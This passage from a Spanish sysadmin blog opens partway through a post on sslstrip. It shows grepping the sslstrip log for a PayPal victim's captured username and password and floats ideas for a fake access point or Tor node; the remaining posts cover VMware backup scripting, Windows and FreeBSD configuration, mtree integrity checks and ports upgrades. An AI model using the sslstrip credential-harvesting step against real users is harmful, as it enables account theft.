sslstrip guarda un archivo de log en sslstrip.log , aunque hay una opcion para cambiarlo, pero que mas da. Entonces podemos hacer una busqueda con grep en el archivo sslstrip.log y veremos el par user / password que introdujo la victima para logearse en paypal:

Ahi esta el user y el pass. El pass es HazUnaPintadaEnInet

Bueno, ¿y como defendernos de SSLStrip? Evidentemente, asegurandonos de que la URL que aparece en el navegador empieza por https escribiendolo nosotros explicitamente.

En principio tengo varias ideas en mente que ire desarrollando en posts sucesivos, como por ejemplo montar un AP falso, o tratar de recrear el escenario que monto Moxie Marlinspike en su charla en la BlackHat 2009 creando un nodo TOR con sslstrip, o leer los logs con una herramienta con menos bombo como SSLparse...

Espero que os haya gustado...

Suerte,

Mas info en este hilo de Wadalbertia:

http://www.wadalbertia.org/foro/viewtopic.php?p=55846

P.D. Gracias al compañero Popolous por el post-it ;)

VMWare disaster recovery

2009-06-03T18:35:00.008+02:00

La idea es tener una tarea cron que copie las maquinas virtuales de un host fisico a otro host fisico VMWare.

No se realiza escritura a disco, pues en VMWare es lo que mas penalizado se ve. Se comprime todo en un lado del tunel ssh, y por el otro lado se va descomprimiendo.

Ahi va:

#!/bin/bash
#
#Copia VMs de FISICA1 a FISICA2 para Disaster Recovery
#
#vlan7 / 13-5-09
#

ALERTA=80 #20% espacio libre
ssh fisica2 df -HP |grep mapper | awk '{ print $5 " " $1 }' |awk '{ print $1}' | cut -d'%' -f1 >/tmp/output
uso=$(cat /tmp/output)

if [ $uso -g $ALERTA ]; then
  echo "$uso % de espacio utilizado a fisica2, abortando copia" >>/var/log/copiaVMsVMWare.log
fi

if [ $uso -le $ALERTA ]; then
  #host1
  echo "Apagando la VM host1 - $(date)" >>/var/log/copiaVMsVMWare.log
  vmrun -T server -h https://fisica1:8333/sdk -u user -p passwd stop "[standard] host1/host1.vmx" soft
  echo "Apagada la VM host1 - $(date)" >>/var/log/copiaVMsVMWare.log
  tar czvf - /var/lib/vmware/Virtual\ Machines/host1/ |ssh fisica2 "cd / ; tar xzvf -"
  echo "Encendiendo la VM host1 - $(date)" >>/var/log/copiaVMsVMWare.log
  vmrun -T server -h https://fisica1:8333/sdk -u user -p passwd start "[standard] host1/host1.vmx"
  echo "Encendida la VM host1 - $(date)" >>/var/log/copiaVMsVMWare.log
 
  #list all available VMs to log
  vmrun -T server -h https://fisica1:8333/sdk -u user -p passwd list >>/var/log/copiaVMsVMWare.log
fi

#enviando correo
tail -100 /var/log/copiaVMsVMWare.log | mail -s "[script] copiaVMsVMWare.sh" user@host.com

Equipos wireless iniciar sesion en dominio

2009-02-25T19:09:00.006+01:00

Si un equipo nunca ha iniciado sesion en un dominio, no tendra guardadas las credenciales en cache. Esto es un problema para equipos wifi que quieran iniciar sesion en el dominio de nuestra organizacion.

Y aunque tengan guardadas las credenciales en cache, no se ejecutara en su maquina ningun logonscript.

La solucion es cargar y activar la tarjeta wifi antes del inicio de sesion, antes de autenticarse.

Yo me quedo con esta manera de hacerlo:

Usar el servicio Windows Zero Configuration (Inicio de sesion wifi facil o algo asi se llama en castellano)
regedit. HKLM \ Software \ Microsoft \ WindowsNT \ CurrentVersion \ Winlogon
Añadir valor DWORD GpNetworkStartTimeoutPolicyValue 3c (hexa) o 60 (dec)
regedit. HKLM \ Software \ Policies \ Microsoft \ Windows \ System
Añadir valor DWORD GroupPolicyMinTransferRate a 0.

Y los clientes ya podran iniciar sesion como si estuvieran conectados a la red cableada.

Win. Ofrecer asistencia remota en la LAN

2009-02-14T12:43:00.002+01:00

hcp://CN=Microsoft%20Corporation,L=Redmond,S=Washington,C=US/Remote%20Assistance/Escalation/Unsolicited/unsolicitedrcui.htm

Esto es con permiso del usuario.

Como configure mi sonido en FreeBSD

2008-11-18T06:31:00.003+01:00

pciconf -lv

no me mostraba nada referente al HW de mi tarjeta de sonido que es una AC'97 de esas malillas integrada en placa.

Bien, carguemos todos los drivers de sonido y asi al menos veremos si FreeBSD la soporta. Edito /boot/loader.conf y añado:

snd_driver_load="YES"

Muy bestia, el sonido ya salia por mis altavoces.

La salida del comando pciconf -lv ya mejoraba...

none0@pci0:2:7: class=0x040100 card=0x70121849 chip=0x70121039 rev=0xa0 hdr=0x00
vendor = 'Silicon Integrated Systems (SiS)'
device = 'SiS7012 PCI Audio Accelerator'
class = multimedia
subclass = audio

Tras investigar me di cuenta de que mi driver era snd_ich.ko

Efectivamente, eliminando snd_driver_load="YES" y cargando en la shell el modulo con

kldload /boot/kernel/snd_ich.ko

bastaba para tener sonido.

Asi que ese modulo solo cargo ahora...

Como configure mi impresora en FreeBSD

2008-11-18T06:26:00.004+01:00

Tengo una Lexmark E250DN conectada a la red, asi que no me hace falta CUPS, etc

En /etc/printcap puse:

lp|e250dn:\
:sh:\
:rm=e250dn:rp=e250dn:sd=/var/spool/output/e250dn:lf=/var/log/lpd-errs:

Y comente:

#\
#:if=/usr/local/libexec/if-script:

En /etc/hosts añadi el nombre e250dn con su IP

En /etc/rc.conf añadi:

lpd_enable="YES"

para que me arrancara el demonio de lp al inicio

Lo demas como cualquier UNIX, lpq para ver la cola, lpd para controlar el demonio, lpr para imprimir...

FreeBSD. Integridad de archivos.

2008-11-17T22:48:00.004+01:00

Todos conocemos Tripwire. Bien. ¿Por que usarlo en FreeBSD si ya tenemos uno de serie llamado mtree?

Mi log:

[vlan7@fbsd7 /usr/home/vlan7]$ su -
Password:
fbsd7# echo A lo practico, minimalista, a ver que pasa si lanzamos mtree contra /usr/bin
A lo practico, minimalista, a ver que pasa si lanzamos mtree contra /usr/bin
fbsd7# cd /usr/bin fbsd7# mtree -c -K vlan7,md5digest,sha1digest,ripemd160digest -s 7777777 >/tmp/mtree_usr_bin
mtree: line 0: unknown keyword vlan7
fbsd7# mtree -c -K cksum,md5digest,sha1digest,ripemd160digest -s 7777777 > /tmp/mtree_usr_bin
mtree: /usr/bin checksum: 2130528872
fbsd7# echo -K ... Quiero un checksum con esos 3 algoritmos de cifrado. 3 hashes, matematicamente mucho mas dificil que romper que 1 hash
-K ... Quiero un checksum con esos 3 algoritmos de cifrado. 3 hashes, matematicamente mucho mas dificil que romper que 1 hash
fbsd7# echo -s La semilla en numero
-s La semilla en numero
fbsd7# echo Esto es un ejemplo, mi numero favorito es el 7, pero cuanto mas compleja sea la semilla, mas seguro sera el checksum
Esto es un ejemplo, mi numero favorito es el 7, pero cuanto mas compleja sea la semilla, mas seguro sera el checksum
fbsd7# echo Apunta esos 2 numeros, y cifralos
Apunta esos 2 numeros, y cifralos
fbsd7# echo Veamos como es el archivo resultante
Veamos como es el archivo resultante
fbsd7# ls -la /tmp/mtree_usr_bin
-rw-r--r-- 1 root wheel 113311 Nov 17 21:47 /tmp/mtree_usr_bin
fbsd7# file /tmp/mtree_usr_bin
/tmp/mtree_usr_bin: ASCII text
fbsd7# echo Es muy grande para ser de texto, veamos las primeras 15 lineas:
Es muy grande para ser de texto, veamos las primeras 15 lineas:
fbsd7# head -n 15 /tmp/mtree_usr_bin
# user: vlan7
# machine: fbsd7.probador.com
# tree: /usr/bin
# date: Mon Nov 17 21:47:28 2008

# .
/set type=file uid=0 gid=0 mode=0555 nlink=1 flags=none
. type=dir mode=0755 nlink=2 size=7168 time=1226802429.0
CC nlink=3 size=172896 time=1203875470.0 cksum=416819826 \
md5digest=9f7de49c50113c6dd8f8a9df5fe5241b \
sha1digest=3f0395e526dc6eda86db1213096d56388350536b \
ripemd160digest=76c6dd731c6c44648d4094328a88b42cda24c636
Mail nlink=3 size=78976 time=1203875563.0 cksum=2798507066 \
md5digest=0f58337d044fce0ed7a3c822c2720c6f \
sha1digest=1519b7ef0dcd7cf209ed4730e247ecc010317366 \
fbsd7# echo el /set es la mas importante, guarda seguimiento de todas las propiedades de un archivo
el /set es la mas importante, guarda seguimiento de todas las propiedades de un archivo
fbsd7# echo Firmamos el archivo
Firmamos el archivo
fbsd7# md5 /tmp/mtree_usr_bin
MD5 (/tmp/mtree_usr_bin) = 8f22740592e8a75568673ca43e48b56b
fbsd7# echo Deberias redirigirlo a un archivo o imprimirlo, lo necesitaras luego para chequear la integridad de la bd
Deberias redirigirlo a un archivo o imprimirlo, lo necesitaras luego para chequear la integridad de la bd
fbsd7# echo cifremoslo
cifremoslo
fbsd7# openssl enc -e -bf -in /tmp/mtree_usr_bin -out /tmp/al_usb
enter bf-cbc encryption password:
Verifying - enter bf-cbc encryption password:
fbsd7# echo bf de Blowfish
bf de Blowfish
fbsd7# echo ahora deberiamos mandarlo a un USB y borrarlo, pero esto solo es un juego, asi que sigamos
ahora deberiamos mandarlo a un USB y borrarlo, pero esto solo es un juego, asi que sigamos
fbsd7# echo no hablaremos de borrado seguro ahora, simplemente lo borraremos
no hablaremos de borrado seguro ahora, simplemente lo borraremos
fbsd7# rm /tmp/mtree_usr_bin
fbsd7# echo Vamos a jugar con la integridad de la bd
Vamos a jugar con la integridad de la bd
fbsd7# echo Desciframos
Desciframos
fbsd7# openssl enc -d -bf -in /tmp/al_usb -out /tmp/mtree_usr_bin
enter bf-cbc decryption password:
fbsd7# comprobamos que no ha sido modificado
comprobamos: Command not found.
fbsd7# echo comprobamos que no ha sido modificado
comprobamos que no ha sido modificado
fbsd7# md5 /tmp/mtree_usr_bin
MD5 (/tmp/mtree_usr_bin) = 8f22740592e8a75568673ca43e48b56b
fbsd7# echo Coincide. El archivo no se ha modificado
Coincide. El archivo no se ha modificado
fbsd7# echo Ahora vamos a ver si algun archivo a auditar del sistema ha sido cambiado
Ahora vamos a ver si algun archivo a auditar del sistema ha sido cambiado
fbsd7# pwd
/usr/bin
fbsd7# mtree -s 7777777 </tmp/mtree_usr_bin
mtree: /usr/bin checksum: 1905672155
fbsd7# echo Es igual, luego nada ha cambiado
Es igual, luego nada ha cambiado
fbsd7# echo Que pasa si algo cambia?
echo: No match.
fbsd7# echo Que pasa si algo cambia\?
Que pasa si algo cambia?
fbsd7# echo Y que cambiamos de forma elegante sin backup\?
Y que cambiamos de forma elegante sin backup?
fbsd7# echo Vamos a cambiar cualquier tonteria. Bluetooth. Yo no uso bluetooth para nada. Cambiaremos un archivo que me dijo un folk y luego desharemos los cambios
Vamos a instalar cualquier tonteria. Bluetooth. Yo no uso bluetooth para nada. Cambiaremos un archivo que me dijo un folk y luego desharemos los cambios
fbsd7# ls btso*
btsockstat
fbsd7# mv btsockstat btsockstat2
fbsd7# echo Ahora vamos a ver si mtree se ha dado cuenta
Ahora vamos a ver si mtree se ha dado cuenta
fbsd7# mtree -s 7777777 </tmp/mtree_usr_bin
. changed
modification time expected Sun Nov 16 03:27:09 2008 found Mon Nov 17 22:37:57 2008
btsockstat2 extra
mtree: /usr/bin checksum: 1394213982
./btsockstat missing
fbsd7# echo Ahi estamos :\)
Ahi estamos :)
fbsd7# echo Directorios importantes en un FreeBSD serian
Directorios importantes en un FreeBSD serian
fbsd7# echo /bin
/bin
fbsd7# echo /sbin
/sbin
fbsd7# echo /usr/bin
/usr/bin
fbsd7# echo /usr/sbin
/usr/sbin
fbsd7# echo /usr/local/bin
/usr/local/bin
fbsd7# echo /usr/X11R6/bin
/usr/X11R6/bin
fbsd7# echo ah y dejamos todo como antes, aunque jamas lo use
ah y dejamos todo como antes, aunque jamas lo use
fbsd7# mv btsockstat2 btsockstat
fbsd7#

FreeBSD. Jugando con ports y paquetes. Instalacion, actualizacion, auditoria de seguridad

2008-11-17T18:24:00.003+01:00

Un log para entenderme a mi mismo:

[vlan7@fbsd7 /usr/home/vlan7]$ su -
Password:
fbsd7# portsnap fetch
Looking up portsnap.FreeBSD.org mirrors... 3 mirrors found.
Fetching public key from portsnap2.FreeBSD.org... done.
Fetching snapshot tag from portsnap2.FreeBSD.org... done.
Fetching snapshot metadata... done.
Fetching snapshot generated at Sun Nov 16 01:27:21 CET 2008:
04a7c3f4f00bb46d78ffad9bd8cf1998afe982e7e72759100% of 54 MB 164 kBps 00m00s
Extracting snapshot... done.
Verifying snapshot integrity... done.
Fetching snapshot tag from portsnap2.FreeBSD.org... done.
Fetching snapshot metadata... done.
Updating from Sun Nov 16 01:27:21 CET 2008 to Mon Nov 17 01:29:14 CET 2008.
Fetching 3 metadata patches.. done.
Applying metadata patches... done.
Fetching 0 metadata files... done.
Fetching 44 patches.....10....20....30....40.. done.
Applying patches... done.
Fetching 8 new ports or files... done.

Esto nos ha guardado un snapshot comprimido de los ports aqui:

fbsd7# ls /var/db/portsnap/
INDEX files pub.ssl serverlist serverlist_full serverlist_tried tINDEX tag

El siguiente comando solo lo tenemos que hacer la primera vez que corremos portsnap, despues siempre el proximo comando a este:

fbsd7# portsnap extract
/usr/ports/.cvsignore
(...)
/usr/ports/x11/zenity/
Building new INDEX files... done.

Y de ahora en adelante cada vez que queramos actualizar, solo tendriamos que hacer el fetch y el siguiente comando:

fbsd7# portsnap update
Ports tree is already up to date.

Vamos a ver si hay nuevas versiones para algo que tengamos

fbsd7# portmaster -L | egrep -i -B1 'new version|aborting|installed|dependencies' | grep -v '^--' | egrep -i 'bitchx|kde'
===>>> kdeaccessibility-3.5.8
===>>> New version available: kdeaccessibility-3.5.10
===>>> kdeadmin-3.5.8
===>>> New version available: kdeadmin-3.5.10
===>>> kdeartwork-3.5.8
===>>> New version available: kdeartwork-3.5.10
===>>> kdebase-3.5.8
===>>> New version available: kdebase-3.5.10_1
===>>> kdebase-kompmgr-3.5.8
===>>> New version available: kdebase-kompmgr-3.5.10
===>>> kdeedu-3.5.8
===>>> New version available: kdeedu-3.5.10
===>>> kdegames-3.5.8
===>>> New version available: kdegames-3.5.10
===>>> kdegraphics-3.5.8_1
===>>> New version available: kdegraphics-3.5.10
===>>> kdelibs-3.5.8
===>>> New version available: kdelibs-3.5.10
===>>> kdemultimedia-3.5.8
===>>> New version available: kdemultimedia-3.5.10
===>>> kdenetwork-3.5.8
===>>> New version available: kdenetwork-3.5.10
===>>> kdepim-3.5.8
===>>> New version available: kdepim-3.5.10
===>>> kdesdk-3.5.8
===>>> New version available: kdesdk-3.5.10
===>>> kdetoys-3.5.8
===>>> New version available: kdetoys-3.5.10
===>>> kdeutils-3.5.8
===>>> New version available: kdeutils-3.5.10
===>>> kdevelop-3.5.0
===>>> New version available: kdevelop-3.5.3
===>>> kdewebdev-3.5.8,2
===>>> New version available: kdewebdev-3.5.10,2
===>>> BitchX-1.1.0.1
===>>> New version available: BitchX-1.1.0.1_3
===>>> es-kde-i18n-3.5.8
===>>> New version available: es-kde-i18n-3.5.10
===>>> kde-3.5.8
===>>> New version available: kde-3.5.10

tenemos un nuevo paquete de idiomas de kde, pero podria romper cosas si no instalamos la ultima version de KDE, lo cual durara bastante, asi que actualizaremos BitchX

fbsd7# portmaster -b BitchX-1.1.0.1
===>>> Port to upgrade: BitchX-1.1.0.1
===>>> Port directory: /usr/ports/irc/bitchx
===>>> Gathering distinfo list for installed ports
===>>> Launching 'make checksum' for irc/bitchx in background
cd /usr/ports/irc/bitchx && make config;
??????????????????????????????????????????????????????????????????????
? Options for BitchX 1.1.0.1_3 ?
? ?????????????????????????????????????????????????????????????????? ?

(...) ? ?[ ]
===>>> Starting check for runtime dependencies
===>>> Gathering dependency list for irc/bitchx from ports
===>>> Starting dependency check
===>>> Dependency check complete for irc/bitchx

===> Cleaning for BitchX-1.1.0.1_3

===>>> Upgrade for BitchX-1.1.0.1 to BitchX-1.1.0.1_3 succeeded

Por defecto portmaster guarda backups de todo lo que modifica. Y si todo va bien, los borra.

Especificando la opcion -b lo que conseguimos es que no los borre, que es lo ideal, poder probar los paquetes unos dias por lo menos

Los backups los guarda aqui:

fbsd7# ls /usr/ports/packages/portmaster-backup
bash-3.2.25.tbz gettext-0.16.1_3.tbz libtool-1.5.24.tbz png-1.2.22.tbz

Si quisieramos volver atras...
...
vamos a arriesgarnos y a instalar el paquete para castellanizar KDE, e inmediatamente volveremos atras

fbsd7# history |tail -15
124 3:08 portsnap -L | grep -i bitchx
125 3:08 portsnap -L
126 3:10 portmaster -L | egrep -i -B1 'new version|aborting|installed|dependencies' | grep -v '^--' | egrep -i 'bitchx|kde'
127 3:12 echo tenemos un nuevo paquete de idiomas de kde, pero podria romper cosas si no instalamos la ultima version de KDE, lo cual durara bastante, asi que actualizaremos BitchX
128 3:13 portmaster -b BitchX-1.1.0.1
129 3:30 echo Por defecto portmaster guarda backups de todo lo que modifica
130 3:30 echo y si todo va bien, los borra.
131 3:31 echo Especificando la opcion -b lo que conseguimos es que no los borre, que es lo ideal, poder probar los paquetes unos dias por lo menos
132 3:31 echo Los backups los guarda aqui:
133 3:31 ls /usr/ports/packages/portmaster-backup
134 3:32 Si quisieramos volver atras...
135 3:32 echo Si quisieramos volver atras...
136 3:32 echo ...
137 3:33 echo vamos a arriesgarnos y a instalar el paquete para castellanizar KDE, e inmediatamente volveremos atras
138 3:33 history | tail -15
fbsd7# !126
portmaster -L | egrep -i -B1 'new version|aborting|installed|dependencies' | grep -v '^--' | grep -i kde
===>>> kdeaccessibility-3.5.8
===>>> New version available: kdeaccessibility-3.5.10
===>>> kdeadmin-3.5.8
===>>> New version available: kdeadmin-3.5.10
===>>> kdeartwork-3.5.8
===>>> New version available: kdeartwork-3.5.10
===>>> kdebase-3.5.8
===>>> New version available: kdebase-3.5.10_1
===>>> kdebase-kompmgr-3.5.8
===>>> New version available: kdebase-kompmgr-3.5.10
===>>> kdeedu-3.5.8
===>>> New version available: kdeedu-3.5.10
===>>> kdegames-3.5.8
===>>> New version available: kdegames-3.5.10
===>>> kdegraphics-3.5.8_1
===>>> New version available: kdegraphics-3.5.10
===>>> kdelibs-3.5.8
===>>> New version available: kdelibs-3.5.10
===>>> kdemultimedia-3.5.8
===>>> New version available: kdemultimedia-3.5.10
===>>> kdenetwork-3.5.8
===>>> New version available: kdenetwork-3.5.10
===>>> kdepim-3.5.8
===>>> New version available: kdepim-3.5.10
===>>> kdesdk-3.5.8
===>>> New version available: kdesdk-3.5.10
===>>> kdetoys-3.5.8
===>>> New version available: kdetoys-3.5.10
===>>> kdeutils-3.5.8
===>>> New version available: kdeutils-3.5.10
===>>> kdevelop-3.5.0
===>>> New version available: kdevelop-3.5.3
===>>> kdewebdev-3.5.8,2
===>>> New version available: kdewebdev-3.5.10,2
===>>> es-kde-i18n-3.5.8
===>>> New version available: es-kde-i18n-3.5.10
===>>> kde-3.5.8
===>>> New version available: kde-3.5.10

Asi se llamaba: es-kde-il8n-3.5.10. Vamos a instalarlo

fbsd7# portmaster -b es-kde-i18n-3.5.8
===>>> Port to upgrade: es-kde-i18n-3.5.8
===>>> Port directory: /usr/ports/misc/kde3-i18n-es
===>>> Gathering distinfo list for installed ports
===>>> Launching 'make checksum' for misc/kde3-i18n-es in background
===>>> Gathering dependency list for misc/kde3-i18n-es from ports
===>>> Starting recursive 'make config' check
===>>> Launching child to update qt-3.3.8_6

===>>> Port to upgrade: qt-3.3.8_6
===>>> Port directory: /usr/ports/x11-toolkits/qt33
===>>> Launching 'make checksum' for x11-toolkits/qt33 in background
cd /usr/ports/x11-toolkits/qt33 && make config;

(...)

===>>> Done displaying pkg-message files

Ha tardado unas 8 horas. Vamos a ver si nos ha dejado los archivos de backup en su sitio:

fbsd7# ls /usr/ports/packages/portmaster-backup
bash-3.2.25.tbz gettext-0.16.1_3.tbz libtool-1.5.24.tbz png-1.2.22.tbz

Vemos que root no tiene acentos ni enyes, pero es porque no esta en la clase spanish

Habria que anyadir la localizacion a la clase propia del root, que es una clase sin ninguna restriccion

Si lo ligaramos a la clase spanish, lo ligariamos a la clase default tambien, y eso para root jamas

vamos a actualizar un paquetito pequeño

uno de los de seguridad

[root@fbsd7 ~]# portaudit -Fda
auditfile.tbz 100% of 51 kB 44 kBps
New database installed.
Database created: lunes, 17 de noviembre de 2008, 08:10:01 CET
Affected package: net-snmp-5.3.1_7
Type of problem: net-snmp -- DoS for SNMP agent via crafted GETBULK request.
Reference:

Affected package: mysql-client-5.0.45_1
Type of problem: mysql -- command line client input validation vulnerability.
Reference:

Affected package: ruby-1.8.6.111_1,1
Type of problem: ruby -- multiple vulnerabilities in safe level.
Reference:

Affected package: ruby-1.8.6.111_1,1
Type of problem: ruby -- DoS vulnerability in WEBrick.
Reference:

Affected package: ruby-1.8.6.111_1,1
Type of problem: ruby -- DNS spoofing vulnerability.
Reference:

Affected package: poppler-0.6
Type of problem: poppler -- uninitialized pointer.
Reference:

Affected package: ruby-1.8.6.111_1,1
Type of problem: ruby -- multiple integer and buffer overflow vulnerabilities.
Reference:

Affected package: xorg-server-1.4_4,1
Type of problem: xorg -- multiple vulnerabilities.
Reference:

Affected package: vorbis-tools-1.1.1_5,3
Type of problem: vorbis-tools -- Speex header processing vulnerability.
Reference:

Affected package: gnupg-2.0.4
Type of problem: gnupg -- memory corruption vulnerability.
Reference:

Affected package: ghostscript-gpl-8.60
Type of problem: ghostscript -- zseticcspace() function buffer overflow vulnerability.
Reference:

11 problem(s) in your installed packages found.

You are advised to update or deinstall the affected package(s) immediately.

ruby es pequeño, vamos a por el

Veamos cuanto ocupa y que dependencias tiene

[root@fbsd7 ~]# pkg_info -rs ruby*
Information for ruby-1.8.6.111_1,1:

Depends on:
Package Size:
8357 (1K-blocks)

[root@fbsd7 ~]# portmaster -b ruby-1.8.6.111_1,1
===>>> Port to upgrade: ruby-1.8.6.111_1,1
===>>> Port directory: /usr/ports/lang/ruby18
===>>> Gathering distinfo list for installed ports
===>>> Launching 'make checksum' for lang/ruby18 in background
cd /usr/ports/lang/ruby18 && make config;

??????????????????????????????????????????????????????????????????????
? Options for ruby 1.8.6.287,1 ?
? ?????????????????????????????????????????????????????????????????? ?
? ? [ ] PTHREADS Enable pthreads support (may break some apps) ? ?
? ? [ ] ONIGURUMA Build with oniguruma regular expressions lib ? ?
? ? [ ] GCPATCH Build with GC performance statistics collector ? ?
? ? [ ] IPV6 Enable IPv6 support ? ?
? ? [ ] RDOC Build and install Rdoc indexes ? ?
? ? [ ] DEBUG Compile-in debug info ? ?
? ? ? ?
? ? ? ?
? ? ? ?
? ? ? ?
? ? ? ?
? ? ? ?
? ? ? ?
? ? ? ?
? ? ? ?
??????????????????????????????????????????????????????????????????????
? [ OK ] Cancel ?
??????????????????????????????????????????????????????????????????????

(...)

Note that some of the standard libraries are provided as separate
ports since they require extra dependencies:

converters/ruby-iconv iconv module

databases/ruby-gdbm: GDBM module

x11-toolkits/ruby-tk: Tcl/Tk modules
japanese/ruby-tk: Tcl/Tk modules for Japanized Tcl/Tk

lang/ruby-mode.el: Emacs lisp modules

Install them as occasion demands.
====

===>>> Done displaying pkg-message files

En un momento me pidio seleccionar opciones. Yo quite IPv6, yo no lo uso

Ahora vamos a limpiar archivos innecesarios

Ala, como en gentoo, el make clean limpia todo menos distfiles...

[root@fbsd7 ~]# portmaster --clean-distfiles
===>>> Gathering distinfo list for installed ports
===>>> Checking for stale distfiles

Vaya, pues no, aqui en FreeBSD parece que tenemos todo OK

[root@fbsd7 ~]# ls /usr/ports/distfiles
KDE
MesaLib-7.0.3.tar.bz2
aspell-0.60.6.tar.gz
(...)
tiff-3.8.2.tar.gz
xorg

pues aqui hay cosas... borrara los no referenciados

alguien lo puede asegurar?

Ahora vamos a limpiar paquetes huerfanos con una herramienta de la suite portupgrade

[root@fbsd7 /usr/ports]# pkg_add -r portupgrade
Fetching ftp://ftp.freebsd.org/pub/FreeBSD/ports/i386/packages-7.0-release/Latest/portupgrade.tbz... Done.
Fetching ftp://ftp.freebsd.org/pub/FreeBSD/ports/i386/packages-7.0-release/All/ruby18-bdb-0.6.2.tbz... Done.
pkg_add: warning: package 'ruby18-bdb-0.6.2' requires 'ruby-1.8.6.111_1,1', but 'ruby-1.8.6.287,1' is installed
pkg_add: warning: package 'portupgrade-2.3.1,2' requires 'ruby-1.8.6.111_1,1', but 'ruby-1.8.6.287,1' is installed

(...)
------------------------------------------------------------------------------

Vamos a ver si hay mucha diferencia entre el paquete instalado como binario al paquete de los ports

[root@fbsd7 /usr/ports]# pkg_version -v -s portupgrade
portupgrade-2.3.1,2 < needs updating (port has 2.4.6,2)

Bueno, actualicemos

Pero primero a ver cuanto ocupa

[root@fbsd7 /usr/ports]# pkg_info -rs portupgrade*
Information for portupgrade-2.3.1,2:

Depends on:
Dependency: ruby-1.8.6.111_1,1
Dependency: perl-5.8.8_1
Dependency: db41-4.1.25_4
Dependency: ruby18-bdb-0.6.2
Package Size:
699 (1K-blocks)

Poco y las dependencias creo que las tenemos todas o casi todas

[root@fbsd7 /usr/ports]# portmaster -b portupgrade-2.3.1,2
===>>> Port to upgrade: portupgrade-2.3.1,2
===>>> Port directory: /usr/ports/ports-mgmt/portupgrade
===>>> Gathering distinfo list for installed ports
===>>> Launching 'make checksum' for ports-mgmt/portupgrade in background
cd /usr/ports/ports-mgmt/portupgrade && make config;

??????????????????????????????????????????????????????????????????????
? Options for portupgrade 2.4.6,2 ?
? ?????????????????????????????????????????????????????????????????? ?
? ? [X] BDB4 Use Berkeley DB >=2 as backend ? ?
? ? [ ] BDB1 Use Berkeley DB 1.85 as backend ? ?
? ? ? ?
? ? ? ?
? ? ? ?
? ? ? ?
? ? ? ?
? ? ? ?
? ? ? ?
? ? ? ?
? ? ? ?
? ? ? ?
? ? ? ?
? ? ? ?
? ? ? ?
??????????????????????????????????????????????????????????????????????
? [ OK ] Cancel ?
??????????????????????????????????????????????????????????????????????

(...)

===>>> Done displaying pkg-message files

Nada, 1 minuto ha tardado

Borramos cualquier port que no este referenciado por ningun otro port ya

[root@fbsd7 /usr/ports]# portsclean -D
Detecting unreferenced distfiles...
[Updating the portsdb in /usr/ports ... - 19395 port entries found .........1000.........2000.........3000.........4000.........5000.........6000.........7000.........8000.........9000.........10000.........11000.........12000.........13000.........14000.........15000.........16000.........17000.........18000.........19000... ..... done]
no unreferenced distfiles found.

Borramos cualquier archivo de distfiles que no este referenciado por algun paquete instalado actualmente

[root@fbsd7 /usr/ports]# portsclean -DD
Detecting unreferenced distfiles...
[Rebuilding the pkgdb in /var/db/pkg ... - 400 packages found (-0 +400) ....................................................................................................100....................................................................................................200....................................................................................................300....................................................................................................400 done]
no unreferenced distfiles found.

Vaya, parece que tampoco hizo nada. Mi pregunta de antes sobra pues :)

Y ahora lo mismo pero con los paquetes que no estan referenciados por ningun otro paquete (paquetes muertos)

[root@fbsd7 /usr/ports]# pkg_add -r pkg_cutleaves
Fetching ftp://ftp.freebsd.org/pub/FreeBSD/ports/i386/packages-7.0-release/Latest/pkg_cutleaves.tbz... Done.
[root@fbsd7 /usr/ports]# pkg_version -v -s cutleaves*
pkg_cutleaves-20071021 < needs updating (port has 20080320)
[root@fbsd7 /usr/ports]# portmaster -b pkg_cutleaves-20071021
===>>> Port to upgrade: pkg_cutleaves-20071021
===>>> Port directory: /usr/ports/ports-mgmt/pkg_cutleaves
===>>> Gathering distinfo list for installed ports
===>>> Launching 'make checksum' for ports-mgmt/pkg_cutleaves in background
===>>> Gathering dependency list for ports-mgmt/pkg_cutleaves from ports
===>>> Starting recursive 'make config' check
===>>> Recursive 'make config' check complete for ports-mgmt/pkg_cutleaves

===>>> Starting build for ports-mgmt/pkg_cutleaves <<<===

===>>> The 'make config' check revealed no dependencies to update

===> Cleaning for pkg_cutleaves-20080320
===> Extracting for pkg_cutleaves-20080320
===> pkg_cutleaves-20080320 depends on file: /usr/local/bin/perl5.8.8 - found
/bin/mkdir -p /usr/ports/ports-mgmt/pkg_cutleaves/work
/bin/cp /usr/ports/ports-mgmt/pkg_cutleaves/files/pkg_cutleaves /usr/ports/ports-mgmt/pkg_cutleaves/files/pkg_cutleaves.1 /usr/ports/ports-mgmt/pkg_cutleaves/work
===> Patching for pkg_cutleaves-20080320
===> pkg_cutleaves-20080320 depends on file: /usr/local/bin/perl5.8.8 - found
===> pkg_cutleaves-20080320 depends on file: /usr/local/bin/perl5.8.8 - found
===> Configuring for pkg_cutleaves-20080320
===>>> pkg_cutleaves-20071021 is not depended on by any other ports
===>>> Creating a backup package for old version pkg_cutleaves-20071021
===>>> Package can be found in /usr/ports/packages/All
===> Installing for pkg_cutleaves-20080320
===> Generating temporary packing list
===> Checking if ports-mgmt/pkg_cutleaves already installed
install -o root -g wheel -m 555 /usr/ports/ports-mgmt/pkg_cutleaves/work/pkg_cutleaves /usr/local/sbin/pkg_cutleaves
install -o root -g wheel -m 444 /usr/ports/ports-mgmt/pkg_cutleaves/work/pkg_cutleaves.1 /usr/local/man/man1
===> Compressing manual pages for pkg_cutleaves-20080320
===> Registering installation for pkg_cutleaves-20080320
===> Cleaning for pkg_cutleaves-20080320

===>>> Upgrade for pkg_cutleaves-20071021 to pkg_cutleaves-20080320 succeeded

Terminated

Primero los listamos

[root@fbsd7 /usr/ports]# pkg_cutleaves -lc
BitchX-1.1.0.1_3 - ircII color client with GTK/GNOME support
bash-3.2.25 - The GNU Project's Bourne Again SHell
bigreqsproto-1.0.2 - BigReqs extension headers
elinks-0.11.2_3 - Elinks - links text WWW browser with enhancements
es-kde-i18n-3.5.10 - Spanish messages and documentation for KDE3
gccmakedep-1.0.2 - Create dependencies in makefiles using 'gcc -M'
glproto-1.4.8 - GLX extension headers
imake-1.0.2_4,1 - Imake and other utilities from X.Org
kde-3.5.8 - The "meta-port" for KDE
linux_base-fc-4_10 - Base set of packages needed in Linux mode (for i386/amd64)
makedepend-1.0.1,1 - A dependency generator for makefiles
nasm-2.05.01,1 - General-purpose multi-platform x86 and x86-64 assembler
pkg_cutleaves-20080320 - Interactive script for deinstalling 'leaf' packages
portaudit-0.5.11 - Checks installed ports against a list of security vulnerabilities
portmaster-1.25 - Manage your ports without external databases or languages
portupgrade-2.4.6,2 - FreeBSD ports/packages administration and management tool suite
qmake-3.3.8_1 - The build utility of the Qt project
resourceproto-1.0.2 - Resource extension headers
